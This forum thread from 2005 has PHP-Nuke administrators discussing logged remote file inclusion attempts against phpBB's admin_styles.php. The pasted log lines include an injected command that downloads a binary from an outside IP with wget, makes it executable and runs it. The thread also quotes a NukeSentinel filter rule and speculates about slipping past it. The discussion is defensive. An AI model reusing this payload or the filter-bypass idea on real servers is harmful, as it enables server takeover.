| Author |
Message |
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
|
 Posted:
Fri Dec 16, 2005 8:45 am |
|
Just reading my logs this morning and came across the following that sure looks like a hack to me:
| Quote: | | 201.9.103.71 - - [16/Dec/2005:05:21:34 -0800] "GET /v-web/portal/cms//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.phantasmairc.hpgvip.ig.com.br/CMD.txt?&cmd=help |
Running Nuke 7.6, patched to 3.1 with Sentinel 2.4.2. Interesting that Sentinel didn't object to this, though this IP only occurred once in my logs so he tried this and went away. Almost looks like an XSS attack? but I'm no expert on this stuff. The IP is from Brazil and it's banned on my site now.
Back to reading my logs ...  |
| |
|
 
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Fri Dec 16, 2005 8:58 am |
|
yes it is,its the same useless script that kiddies use... |
| |
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Fri Dec 16, 2005 1:33 pm |
|
fkelly, just curious as to why you would expect NS to catch this? |
| |
|
|
|
|
fkelly
|
| Posted:
Fri Dec 16, 2005 3:07 pm |
|
Raven: I didn't analyze it in any depth at the time but I recently posted on the filters that were screening out some Gallery commands (no responses btw) and I recalled some lines of code from NS like:
Code:if ((stristr($nsnst_const['query_string'], "cmd=") AND !stristr($nsnst_const['query_string'], "&cmd")) OR
(stristr($nsnst_const['query_string'], "exec") AND !stristr($nsnst_const['query_string'], "execu")) OR
stristr($nsnst_const['query_string'],"concat") AND
!stristr($nsnst_const['query_string'], "../")) {
block_ip($blocker_row);
|
so I was thinking that if the string "cmd" was somewhere in the query string (A Get) that t he filters in NS would catch it and ban the IP. Looking more closely at it, there is also a "&cmd" in the string which I suppose would negate the condition and let the query string pass thru. Which raises in my mind the question I brought up in the original post, couldn't a hacker stick the string "&cmd" somewhere in the query string and bypass the edit because of it and still do some damage? I don't pretend to really have an in-depth understanding of how these hacks work but I'm trying to learn.
My post on Gallery and the filters is at:
Only registered users can see links on this board! Get registered or login!
so I won't repeat any more of it here. |
| |
|
|
|
|
Raven
|
| Posted:
Fri Dec 16, 2005 3:24 pm |
|
Try it on your own site and see what happens. Did you get any strange messages? |
| |
|
|
|
|
fkelly
|
| Posted:
Fri Dec 16, 2005 3:52 pm |
|
The Socratic method? LOL but you have a point, I had to dig into the logs again and try some things ...
What I get is a 404 error ... the requested resource cannot be found. Now in the original so-called exploit there is a double slash "//" between "cms" and "modules" in the path and even when I eliminate that I still get a 404 error.
Granting that hitwalker is right and it is some useless kiddie script the issues raised in my original post still remain. Not that they couldn't be similarly disposed of but ... |
| |
|
|
|
|
Stray_Bullet
New Member
Joined: Nov 13, 2004
Posts: 17
|
| Posted:
Mon Dec 19, 2005 4:42 pm |
|
I had the same problem...
Here's an email I sent to Chatserv...
Subject: just a question...
Thanks for the reply Chatserv!
Here's what I seen in the logs...
Code:
[17/Dec/2005:05:18:40 -0500] - - 195.82.6.3 "GET
/modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http:
//81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%2074
4%20criman;./criman;echo%20YYY;echo|
HTTP/1.1" "-" 302 498 0
[17/Dec/2005:05:18:41 -0500] - - 195.82.6.3 "GET
/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174
.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20crim
an;./criman;echo%20YYY;echo|
HTTP/1.1" "-" 302 498 0
|
Another IP...
Code:
[17/Dec/2005:09:14:57 -0500] - - 81.186.243.2 "GET
/modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http:
//81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%2074
4%20criman;./criman;echo%20YYY;echo|
HTTP/1.1" "-" 302 498 0
[17/Dec/2005:09:14:58 -0500] - - 81.186.243.2 "GET
/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174
.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20crim
an;./criman;echo%20YYY;echo|
HTTP/1.1" "-" 302 498 0
|
Like I said it did not get anywhere but redirected back to the IP that
sent it, but I thought I seen something about
"/modules/Forums/admin/admin_styles.php"!
Thanks again!
--
Stray_Bullet
His reply was...
If you have modules/Forums/admin/admin_styles.php in the server get rid of
it.
He said php-nuke does not use it or something of that sort...
Look here... Only registered users can see links on this board! Get registered or login! |
| |
|
|
|
|
Raven
|
| Posted:
Mon Dec 19, 2005 5:13 pm |
|
That's an exploit from phpbb v2.0.12 I believe |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
